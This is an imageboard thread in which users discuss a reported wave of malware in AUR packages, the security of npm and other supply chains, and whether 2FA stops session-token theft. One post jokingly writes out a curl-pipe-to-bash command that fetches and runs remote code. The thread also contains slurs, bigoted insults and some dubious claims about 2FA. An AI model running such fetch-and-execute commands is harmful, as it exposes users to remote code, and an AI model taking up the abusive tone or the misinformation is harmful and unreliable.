>>109031268
if you use the AUR or think it's good you're a retard.

How do you protect from info stealer malware? Do you just pray 2FA works on online accounts?

>>109031293
Security keys

File: 1777476064446924.jpg (362 KB, 1482x740)

362 KB JPG

>>109031268
Usecase of AUR?
My Gnome Linux works just fine.

This is one of my concerns about Arch, I keep hearing the AUR being touted by the Arch community as a prime feature, but it seems like it's basically a Wild West frontier land where there's nearly zero oversight and basically anything goes.

>>109031408
You have to be the oversight yourself.
If you cannot parse bash scripts, you shouldn't use AUR.

>>109031408
who parses the pacman repo?

>>109031268
Why is everything on Discord in 2026?

>>109031694
Normoids.

>>109031694
Ease of use, low barrier of entry, massive pre-existing userbase, lots of features, etc.

>>109031711
In other words, things normoids care about.

>>109031694
virgins like when they get the admin role on a platform for niggers

>>109031268
I'm too lazy to vet everything and supply chain attacks are becoming more common. I moved off a rolling release distros after the XZ utils attack.

>>109031721
things normal people DONT experience themselves as caring about because its normalized

>>109031268
> more malware in an unrestricted repo where anyone can upload anything at anytime

Really shocking stuff. Who would have known that you shouldn't run random executables anonymous people upload on the Internet?

>>109031268
AUR is Arch's Achilles Heel. It just won't survive the (AI) malware attacks that are coming.

>>109031268
>orphaned packages again
How many times again this needs to happen before AUR takes note?

>>109031404
>Usecase of AUR?
Sometimes you want something that's not in the official (yet).
For example I play the game "Factorio" and use the music service "Deezer" which have AUR packages but no official ones.

>>109032312
what makes a package orphaned? not updated in a week?

>>109031967
You have to be a "trusted user" to upload to the AUR.
Basically be part of a special club.

>>109032341
>you dont understand, i need to UPDOOOT!

>>109031268
How retarded do you have to be to be using Arch.

https://gr.ht/aur_pkg_list.txt complete list of affected packages, there are over 400 of them.

>>109031408
I installed Arch last year, decided to never use the AUR, and stopped using pip as I realized it was like sticking your dick in a gloryhole. I use a couple of "verified" flatpaks from flathub but that's about it.

>>109031408
Well it is still better than:
>go to website that totally is ours
>click this legit exe installer
>it installs an auto-updater, a launcher, and the app
>trust us, bro, we will only check for updates on our software
This is literally the windows and often enough the MacOS experience when dealing with 3rd party software.

File: Screenshot_20260611_235519.png (131 KB, 946x807)

131 KB PNG

why is npm so shit?

>>109032668
They haven't even taken down the malicious package yet ffs https://www.npmjs.com/package/atomic-lockfile

File: 1711219584972692.jpg (190 KB, 700x736)

190 KB JPG

You run Arch, btw.

>>109031292
this.
my desktop is on Arch and I have never needed the AUR in all the 9 years I am using Arch.

>>109032694
but the repo is down if you check it

>>109031268
I was wondering why this never happened before.
The archfags always told me "because it's all carefully checked!" but I know how well that works.

What a surprise.

>>109031292
Basically this.

>>109031404
"Usecase" is that the Official repos are pretty limited (Waterfox isn't in it but Firefox is; as an example) so you use AUR if you want a "repo-like" experience over compiling or using flatpak/appimage/snap instead.

>>109031292
At this point I really need to learn to compile things myself. I've been lazy to do it because I only need a few things that the official repo has already, but it's a good "skill" to know.

>>109032647
>Download from github release
or
>Follow the link for the offical website on the github page
You also get software updates as fast as the dev releases and no risk of your packager getting compromised.

>>109032778
People have added malicious code to the release zips that isn't in the original repo. That's what the xz backdoor did.

>endeavor
>cachyos
lmao, like clockwork, the two jeetiest arch distributions

>>109031292
>wlrobs-hg
>droidcam
>dz6

>>109031268
The AUR is a joke and always has been. Only the tranny element of the Arch userbase needs it, and I'm in favor of them getting malware.

>>109032778
I still trust the AUR more than rando GitHubs.
One of the functions of the AUR is to scan packages for malware and test they don't cause other major issues.
Anyone can put anything on GitHub but only selected people can upload to the AUR.

>>109032778
Github accounts and official websites get compromised and serve malware all the time. So do third party download sites like Fosshub. If you're retarded enough to think you're safe just because you're downloading from a "trusted" website then you probably already have malware installed. CPU-Z downloads were replaced with malware on the official site just a couple of months ago, and basically everybody who owns a PC has that installed.

https://www.techpowerup.com/348138/security-psa-popular-tools-cpu-z-and-hwmonitor-were-briefly-compromised

>>109031268
I love the AUR in theory, it's the ultimate freedom and doesn't care about free/non-free, just packages for users. But this isn't the first time Malware has been uploaded and it won't be the last time.

There are some official AUR packages directly from the Dev, like RPCS3. Please always check out your favorite App before. Also, the AUR should notify the user "this package changed ownership"

>>109031268
fuck and ive used alvr, not on my arch machine tho
they should make a separate AUR for malware so i can use the normal one

>>109032644
Good choice, I recently thought about Pip and it seems like this shit is just as dangerous, probably even more so, because it's so popular.

>>109033022
Exactly.

People make a big deal about malware in the AUR because it hardly ever happens.
Meanwhile all the Wintodlers currently have a zero day because some sperg picked a fight with Microsoft (and probably rightfully so).

>>109031293
>>109031379
The Info Stealer would just steal your session token instead. 2FA is worthless here. The first thing they grab is your browser cookies.
2FA didn't prevent those Microsoft employees from getting their stuff taken over on github and 2FA didn't stop all those ecelebs from getting their youtube channels stolen.

>>109033028
If I had to design the system I would make it so at least 3 people who don't really know each other have to approve a package/update before release.
Let each of them scan for malware before giving the green light.

Not sure how it actually works though?
Is it just one person responsible per package?

>>109032332
>For example I play the game "Factorio" and use the music service "Deezer"
You should only use FLOSS software and play FLOSS games, and listen to media which is out of copyright. Like Vivaldi phonograph cylinders. This is your fault for not keeping a clean system running something like Trisquel.

So what a pleb should do?

Use only pacman and flatpaks?

>>109033000
>but only selected people can upload to the AUR
What? It is basically: make an account and push a git repo. There is no gate.

>>109033114
That is the mentality of the spergs maintaining the official repository, yes:
>You choose not to use Microslop so you must be against paying anyone for their work.
And that's exactly why we need the AUR.

>>109033161
Don't worry too much. If you need it just install it. Regularly do a pass on stuff that you don't need and remove it again. Flatpak is trying to get universal packaging and sandboxing right, but a malicious flatpak will ask for more permissive environment and still be a problem.
There is no super pleb friendly way of sandboxing without ending up on iOS and a centralized App store.

>>109033161
Doesn't really matter, anything 'official' and legit can be hijacked like CPU Z and that was on their own page. Just luck of the draw and you hope that some autist catches it before you install/update e.g. xz and the microslop autist

>>109033069
Sounds good. I think it's relatively easy to take over a package, I read a couple messages in discord, but I'm not sure how it works exactly.

AUR build scripts should just be the exact copy of the original build from github to build on Arch, maybe some small fixes. There should be automation, so it only pulls the original project. But some builds a buggy and need manual fixes and dependencies, so I don't know how that would work. 3 people checking the package sounds good, but there are so many packages available, I don't think that's an option for a community distro.

Arch devs need to get rid of the AUR.

>>109031268
Arch is not a serious distro. I do appreciate Arch users for their beta testing of the kernel, however.

>>109033292
xz was surprisingly a one off. The best thing to do is not use the AUR or switch distros.

>>109031408
>but it seems like it's basically a Wild West frontier land where there's nearly zero oversight and basically anything goes.
PKGBUILD are just install scripts, you're suppose to eyeball the fucking install script before you use it. If you see it going to some sketched out source then don't install the shit.

>>109031268
>sees thread
>wtf is alvr?
>looks it up
>"Stream VR games from your PC to your headset via Wi-Fi "
>wow. that AUR attack must have affected MILLIONS of people, i tell ya
>most comments are, as always, are /g/eet wintards who know fuck all

>>109033351
xz was found. You obviously don't know about stuff that is not.
>>109033441
The script might look fine and something else is compromised. You never know from looking at a script.

File: 642d9629e83bb5898472436bf(...).jpg (49 KB, 564x886)

49 KB JPG

>Anyone can take over an Aur if the original author doesn't respond in two weeks.
Holy fuck that's retarded.

I thought I had more stuff from the AUR installed but surprisingly do not. Still gonna start culling stuff I am not using now.

>>109031404
Therw isn't one. Arch and all the dogshit forks of Arch are for retards and trannies.

>>109032748
>I was wondering why this never happened before.
it's happened like three different times in the last year or so

>>109033802
I mean, xz would have been found at some point. If it hadn't been found by that dude on Debian sid, it would have been found when it entered production. It's pretty hard to hide that kind of shit when most of the world's webservers run on Linux and a bunch of dudes get paid ridiculous money to protect the billion dollar industries that run on said servers.

>>109032726
>>109031292
I use it for like three packages and thats it. I dont see how its a big deal.

i am unironically switching off archlinux after this. xz was an eyebrow raiser but now this is kind of a wake up call. these supply chain attacks are such a common occurrence that even sticking to official repos makes me uncomfortable. just gonna use debian and embrace being 1 year behind everything but at least i'll have some peace of mind

>>109034856
You should take the nix pill.

>>109034859
nixos is even worse. there is a layer of bullshit slapped in front of every package so it can be interfaced through the nixos configuration language. nixpkgs review process is also spamming their discord begging for overworked trannies to approve your PR. it's a matter of time before something slips there. best is to just use a distro like fedora or debian and stay on stable branches, let the people on rawhide or sid be the safety net

>>109034859
that's a troon pill

>>109034997
no wait arch is one too
you will overdose

>>109031268
Arch needs to remove AUR. It's a trashfire. I don't care how much disclaimers they have about it not being "official", it's hosted on their main site and is linked from the main page. You can't play this game where you pretend AUR is not a part of the Arch repository, but when I complain about a package not being on Arch (they have the smallest repository of any major distro), you point me to the AUR. You can't have your malware-infested cake and eat it too.

>>109031268
ALVRGA WE QUE MIEDO!!!

>>109034665
Last times it happened, it was with fake packages aping legitimate ones with similar names. This time the hackerman just swooped up a bunch of orphaned AUR packages (there is nothing stopping anyone from doing this).

>>109031268
>>109032726
I can see where you're coming from but what's the point of Arch without the AUR? It's just Debian testing or Gentoo without portage.

>>109032668
>not at least locking down to a specific npm package version

software developers are the jeets of software

>>109031292
>>109032726
I am a lazy sack of shit and I find makepkg to be convenient.

Switched to Fedora about a month ago after over 6 years of Arch usage. Good call.

File: anime girl pepe worried.png (567 KB, 1440x1080)

567 KB PNG

Ok I seem to be clean (for now), I installed very few aur packages this year anyway.
No atomic-lockfile in "sudo npm list -g --depth=9999" and I ran https://gist.github.com/Kidev/59bf9f5fb53ab5eee99f19a6a2fc3992#file-aur_check-sh which spit out:

Checking for infected AUR packages (446 total)...

WARNING: 1 infected package(s) found:
  - python-future

which made me panic before realizing that I had that installed from official repo in 2024 before package was moved to aur.
Still, this feels shady as fuck. More and more malware, certain obsolete design decisions like how AUR repo works and LLMs empowering script kiddies, make it feel like a question of when rather than if there is going to be a great pwning. I feel like Pewds video cursed Arch by making it a much more attractive target.
Maybe I should move on to Gentoo autism or something.
I am not feeling safe and I don't think I am being paranoid.

>>109035489
>I can see where you're coming from but what's the point of Arch without the AUR?
I don't know, I just never needed it, everything I have installed comes from the original repos and my Arch machine is my gaming machine so there's not much needed.

File: Screenshot_20260612_111535.png (31 KB, 724x134)

31 KB PNG

>>109035762
That's why you install AUR helpers (either paru or yay) that automatically inform you of shit like that. Every time the main repos drop a package it always pops up here and I clean that shit up. New AUR updates always show me a diff between old and new version and the npm install atomic-lockfile line would have stuck out like a sore thumb.

so what am I supposed to do now? am I supposed to actually go on the github repo of the project I want to install and literally read the #installation area of the README? like a caveman?

File: 1776952258177264.png (48 KB, 1153x247)

48 KB PNG

not my problem

>>109033764
It isn't just one package. There are over 400 packages which have been confirmed compromised so far.
https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/
Looks like you were the fucking retard after all, anon.

>>109031292
/thread

>>109033000
>One of the functions of the AUR is to scan packages for malware
wow

>>109032644
What about uv? It uses the same packages I think?

>>109035944
I rarely use AUR but... just check the files before running makepkg? You can even direct your most capable LLM to verify them for you but usually there isn't much to check.

>>109032332
why the fuck do you need a userpackage for factorio? it's closed source and they already provide official linux binaries

I only install software via
>curl -fsSL https://trustworthy.com/install.sh | bash
I think I'll be safe.

do we know the timeline of the malicious packages? I formatted 5 days ago barely have any packages installed yet but I might have been fucked before that

>>109035944
You are supposed to go to the github page and check if the PKGBUILD from AUR uses the same repo and check if it isn't doing something too different from the instructions in the readme.

>>109033053
Correct. Only way to prevent this is if the service in question were to not use session cookies but would require access tokens with each request, which continue to be generated by a hardware key. FIDO/WebAuthn-compatible keys actually support a hands-off mode for repeat generation of access tokens for as long as session remains open, so this is completely possible. But it requires that your entire session management solution is constructed around it to properly supported and at no point whatsoever attempts to reconcile various login strategies and session management strategies to the lowest common denominator, that being a session cookie. Meaning the TL;DR here is: possible, but never happening.

File: 1778284029113429.png (16 KB, 500x564)

16 KB PNG

>>109031268

>>109031268
AuR is such a success story, it's an amazing tool for regular users and developers alike. That's why it's targeted so much. You can cry but it's here to stay.

>>109033441
you do realise they can buy the domain name if a dev forgets or it laspes and youl have no way of knowing

>>109031686
The maintainers and trusted users who have to show a track record of good packaging in AUR first.

>>109032341
The maintainer disowns it, or if they aren't active anymore someone can request it is disowned from them if it's been marked out of date for 2 weeks, with a definite success if it's been out of date for 6 months.
There are security scanners that can check if a package has been orphaned and then adopted by someone who's changes you haven't checked yet, and tell you to apply extra scrutiny, but they aren't very good, and they aren't commonly used.

>>109035678
me too up until recently but all the thirdies realizing that they can just supply chain attack means we can't have nice things.

>>109032606
Where's this list come from and how was it generated? I'm seeing plenty of packages in there which are completely fine. No malware.

>>109032748
Who told you that? Every time it happens the developers essentially say "surprised it doesn't happen more. On AUR, you are on your own." and it's true. The only person you can trust to carefully check AUR PKGBUILDs is yourself.

>>109033000
Not true in the slightest. To be as charitable as possible you are maybe thinking of Chaotic AUR, which does check for malware and does have a limited set of people who can check packages. If you're so reliant on Chaotic AUR that you think of it as just "AUR" though you have other misunderstandings.

>>109037622
Anon... Do you really believe anything you just said? This is open source tech, it will always be compromised or shit. Nothing in between. What is the other incentive for a person to make sure open source free (as in free beer) software runs fine, other than plantin malware in there?
Sometimes I don't understand people. Is this some commie propaganda consequences or what? Why would anyone believe that complicated niche software is done for free? At best it is done by corpos, who have absolute control over it and just allow you to use it, while actually using you like a beta tester (think Fedora Linux, Ubuntu and such).
Nobody does anything worthy and complicated for free. Because it takes effort. Nobody would waste their only life for your benefit, for free, for nothing in return.

Same thing is happening to Fedora and probably every other Linux distribution as well. Really, open source development where anyone contribute is probably done now that social engineering to compromise supply chains can be automated at scale.

>>109038171
It was always like that, in fact easier before, because now you'd check for random people trying to contribute trash. In the past any activity felt like blessing, so building trust was way easier for bad actors. There is no open source piece of software in the world that is widely used, but not compromised by at least 3-4 agencies from different countries.

>>109032775
>At this point I really need to learn to compile things myself. I've been lazy to do it because I only need a few things that the official repo has already, but it's a good "skill" to know.
hope you like tracking down cmake errors

my fedora couldn't stop winning
*tips*

>>109031268
Gotna funny story to share.
>Be me
>Last night in the bathroom
>Took a massive Arch
>Wiped my Artix
>Flushed the Cachy
>Cachy got stopped up by the massive log of Arch
>Had to plunger the Cachy three times
>The log of Arch was so big it hurt my Artix for a while after
What a night in the bathroom!
Did you like my true story?

>>109038171
fedora has user maintained repos?

>>109038713
Your mom is a user maintained repo. Where do you think she gets the money for your Dino Nuggies, Captain Chud?

>>109038240
kek

keepASS infected!

>>109039155
https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/message/5FDTMKA54RMWNRHJFUAKXEBAFV5WPDUL/

>>109039159
almost 900 packages

Maybe it's time to give NixOS a try...

>>109031268
dont care
havent updated in months

>>109031630
>just manually verify every update, bro
No wonder Arch has a reputation as a distro for NEETs.

>>109039257
>just manually verify each line of code in each update bro
Arch trannies are the worst

>>109039257
You only have to check the diffs after you've installed a package, and 9 times out of 10 it's just the pkgver and checksum variables changing. Takes maybe 1 minute per week. You and I both waste more time on 4chan. I waited longer to get a captcha and make this post than I took verifying diffs.

>>109039419
Did it take longer than coming to 4chan to tell lies?

>>109039426
What part of my post do you take issue with?

>>109031292
If arch had proprietary packages in their official repos it wouldn't be needed, but for shit like vscode or any proton that's not included into steam it's a requirement.

>>109031268
>corporate hacking is now just targeting free software now
Saw this coming. No way will corporations just let free software just exist when they need to shill their AI garbage for the sake of their asset portfolios.

>>109031293
2FA is just a method of triangulating you for the sake of advertisement, indoctrination and exploitation. That's why they pushed it hard post covid.

>>109033053
2FA arguably made more threat vectors in most systems. You've added a 2nd stdin point to cause exploits to happen. Furthermore, you've potentially added more personal information as part of 2FA that can triangulate who you are and what you are doing.

>>109035762
At least this exploit got caught.
With closed source they never even get caught because nobody checks.

>>109036203
You think that's bad, Windows anti-malware has had numerous forms of malware.

>>109038171
You're correct, the only method of preventing these things is to prevent proprietary AI full stop.
>this will never happen

Guess we're just slaves to machines then.

>>109039313
This is why windows is nothing but malware nowadays.
>nooooo I must have my bloat

I thought Linux couldn't get viruses like anac

>>109031268
Fedora doesn't have this issue

>>109039511
I'll bet it does, but people using Fedora never check it.
Again, Arch users actually check this shit.

>>109039511
What about COPR?

>using VR
>on linux
odd.

reminder that the AUR comes turned on by default on cachyOS
retard gaymers getting pwned on a mass scale rn

>check the packages
>it's all slop packages you really shouldn't be installing anyway
>if you MUST install them, the affected people clearly didn't inspect the PKGBUILD which every fucking good AUR helper lets you do

>>109039455
>2FA is just a method of triangulating you
>2FA that can triangulate who you are and what you are doing
...how? genuinely asking.

File: 1781225656521553.png (10 KB, 626x96)

10 KB PNG

>never update AUR packages because I'm lazy
>already ignored python-future because it wouldn't build with 3.13
>malware doesn't even steal firefox credentials anyway
Nothing ever happens

>>109032312
most decent AUR helpers throw a bunch of warnings if you install an orphaned package too

>>109039554
>on by default
In what way is it "on"? You mean it comes with an AUR helper preinstalled?

>>109034474
i swapped most of my AUR packages with flatpaks and it just werks since then + you get sandboxing so a well designed flatpak can't really infosteal

>>109039712
still need to use flatseal to make sure the default perms aren't like a wide open door
but yeah now that I think about it, I had been doing the same over the past couple of years.
down to 21 packages from the AUR, but think I can go a little further yet.

>>109039748
it's not perfect but iirc flatpak-next should fix a lot of the problems around permissions

i just got tired of dealing with package rebuilds on the AUR

>retards taking this opportunity to shill flatpak

>>109035762
bro. just read the fucking pkgbuild diff, if anything t his should have been a wake up call to do just that

>>109040014
people who can't do this shouldn't be using arch. in most normal updates it's like 2-3 lines that get changed.

>>109040024
I suspect alot of victims from this are going to be cachyos people kek

>>109039628
FIREFOX CHADS WON

>>109040038
i also noticed a lot of weird broken pidgin english comments about this so idk if MS spun up a bunch of shills or what

Imagine being too much of a scrub to compile your own packages on Gentoo

>>109040745
what do you think the AUR is exactly

>>109031404
>Gnome Linux
GNU Network Object Model Environment Linux

>>109040038
How many of those are going to be using paru or even shelly though? Most will probably stick with cachy's own installer surely.

>>109031268
VR fags desreve it

>Fetching infected package list...
>Checking 1577 known infected packages...
>Clean: none of the known infected packages are installed.
Feelsgoodman.jpg

File: file.png (16 KB, 384x166)

16 KB PNG

How FUCKED am I?

so this is how they're gonna do away with *nix huh, because you just know this is poc and every distro is now marked for death following "AI" and apple ms alphabet will tout their closed source approach as the messiah of software when in truth they're far worse and literally push malware like tiktok so they can continue living in their globalist extremist lalaland where china in exchange will allow meta and other burger platforms aaaany day now

>>109041356
run

pacman -Qs alvr

and hope you dont see anything

>>109031408
>but it seems like it's basically a Wild West frontier land where there's nearly zero oversight and basically anything goes.
Just like with all user maintained repositories in any distro.

There's nothing better or worse with Arch in this regard.

>>109039455
>2FA is just a method of triangulating you
Source?

>>109038240
Good one, where is steamos?

>>109041356
Deserved for using meme browsers, also did you use a local password manager?

File: 1780556302247271.gif (91 KB, 220x256)

91 KB GIF

>YOU AGREE TO USE THE AUR AT YOUR OWN RISK
ogey
>you got malware
HOW COULD THIS HAPPEN? THEY SHOULD HAVE PROTECTED MEEEEEEEEE

How does this affect me as an arch user that immediately removed aur related things?

I thought the whole point of linux was compiling shit and reading the buildfiles and being the one to destroy your os rather than you being lazy in a terminal

>>109031293
Use containers or have autistic selinux labeling no one is going to bother doing.

It always makes me laugh that antivirus still can't stop this shit and yet retards still force its use.

>>109044487
The best antivirus is not being a retard

>>109044487
The funniest thing is how many people probably have rats on windows keylogging their every move. Same thing on retards who came from it thinking you have to updoot everything instantly as soon as you go in. People really haven't learned not to fix shit that isn't broken.

>>109044496
True or not, there are whole compliance frameworks that demand it be used.

>>109044513
I watched a guy run a windows update that caused 100 computers in a room to all bootloop after telling him that it would happen on the specific hardware setup.

I said go ahead then.
took him 2 days to get em all back to the previous state because the retard also didn't image beforehand.

>>109039932
Your alternative, dumb fuck? Ever tried writing a MAC policy?

>>109044527
may be learn to read, faggot
see
>>109044454

File: 1508270362909.png (477 KB, 689x679)

477 KB PNG

>>109044465
>as an arch user that immediately removed aur related things
But Arch doesn't come with those in the first place, aur helpers aren't even in the official repos so if you want to use them you first have to build the packages manually.

File: 1776015628478265.png (1.28 MB, 680x491)

1.28 MB PNG

>+30000 unofficial Windows packages from random websites have malware every month
>nobody cares
>+20000 unofficial macOS packages from random websites have malware every month
>nobody cares
>400 unofficial Linux packages from random websites have malware for 3 hours
>anons move to Windows and macOS
/g/ is propably most cuck slave stockholm syndrome baby duck retards ever in the history of the world.

>>109045144
linuk was not supposed to get birus

File: 1757448749974050.jpg (209 KB, 1920x1080)

209 KB JPG

So what is the solution? Why doesn't Arch team just take over the management of AUR?
Offloading security and quality control of AUR onto users doesn't work in 2026 (it never did but especially not now).
A fucking LLM bot can sign up, take over orphaned packages, insert malware and push updates... and it would take hours/days for it to be discovered and potentially thousand of users would be impacted.

PS: hope you don't have your crypto wallet on your main machine.

>>109044469
i have a very autistic firejail set up
so the risk to me is very much reduced

the amount of time i wasted debugging issues caused by it wasn't worth it

>>109035489
You can use portage on Arch.

>>109045055
I blocked all of their mirrors. I have the list at the very least.

>>109045742
Do you want to be a tard wrangler for free?

>>109045144
it's 1365 at the moment according to https://md.archlinux.org/s/SxbqukK6IA

>>109047421
wait, no, it's 1740

>>109047415
Well, they should move the AUR to a different domain and not be associated with it. They are damaging Arch's reputation (what they have left of it) by doing the hosting and by branding it as part of Arch.
Security issues will only multiply going forward.

>>109047466
I see it no different than not immediately removing the microshit store from windows 10 and up.

I do agree with you though. While this sort of thing is common in user repositories (github always gets fucked) it could be better warned of and watched.

>>109047486
Maybe delay all immediate updates by few hours/days so people can check out the release? Or create some kind of an "update check" LLM that can catch most obvious trojans?

>>109048062
The truth is I don't update shit unless i HAVE to.
I don't know why some people are spastic as fuck with their home computers as if they are working for a retard corpo. In that case I'd absolutely be updating everything an maliciously complying with everything just to fuck with the lead

https://gist.github.com/Kidev/85756c3dcad3623ca5604a8135bafd14

Check if you've been compromised with this script.

>>109048576
I have not been compromised. Why don't people just have a aids machine that they let get fucked by these so they can sniff out where this shit gets sent and then fuck with them?

File: 1.png (54 KB, 275x258)

54 KB PNG

>>109047439
it's up to 1934 now

makes npm look weak

>>109048803
I use arch btw
unironically though
I don't use AUR though I thought that shit was gay as fuck. Github but for faggots outside of the normal github grindr base

Is there not a list of malicious commit hashes in the aur.git repos? Looking for the python-future one specifically. Arch maintainers have not made incident response particularly easy.

>>109033179
And now you have Windows XP tier viruses so congrats I guess.
Meanwhile, I only upgrade from Debian oldstable to oldstable, and expect library authors to backport security fixes 3 major versions ago. Software moves too fast and we need to slow it down. Otherwise your stupid binary shit could get included in the official mirror and wouldn't need a maintainer because it would only change once every 10 years.

>>109048947
>I only upgrade from Debian oldstable to oldstable
the weird thing is that Fedora actually has something like oldstable but it's not advertised at all

>>109047415
It's very Jewish of you to act like this is normal. If I host code, I am responsible for it. Every AUR submission should have been vetted.

>>109049049
Can I get the teleport co-ordinates to this perfect world you think exists?

>>109049049
>If I host code, I am responsible for it
yeah and hiro is personally responsible for all the deranged shit people post here

>>109031268
The AUR is such an obviously pozzed shithole.
I use Wivrn for my headset anyway.

>youtubers trick techlets into installing linux
>desktop marketshare goes slightly up
>distros become a more lucrative target for criminals and there's an uptick in aur malware
>goalpost is then shifted to "who uses the aur anyway? lol"
i hate you vermin with the passion of a thousand suns, everything your brown hands touch becomes shit.

>>109049058
No, because you still have no argument, you're just shitposting retard cancer.

>>109049080
>users posting words is exactly like users posting software to your website to be downloaded and run by others

>>109049080
This doesn't even make sense because hosts (including 4chan) have to take down CP and the other deranged shit. Leaving it up DOES make him personally responsible, because it makes him a redistributor.

>>109047486
That makes no sense, Microsoft store comes with Windows and it is a curated app store by Microsoft. AUR doesn't come with Arch and it's a user repository.

>>109049358
>Microsoft store comes with Windows and it is a curated app store by Microsoft

Apple, Android, Windows app stores are a dump of jeet malware binaries. There are no repercussions for thirdworlders if they get caught.

>>109049313
>users posting words is exactly like users posting software to your website to be downloaded and run by others
yes
it's user-generated content in both cases
>>109049322
>This doesn't even make sense because hosts (including 4chan) have to take down CP and the other deranged shit
and the AUR takes down malware if they get reports of it

>>109031711
And mandatory cock scans for proof of age.

>>109031694
bitch made human race takes path of least resistance not knowing it will lead to more resistance later

>>109031268
Isnt AUR unoffical repo?

>>109049152
>distros become a more lucrative target for criminals
If you aren't like the techlets you complain about this still isn't a problem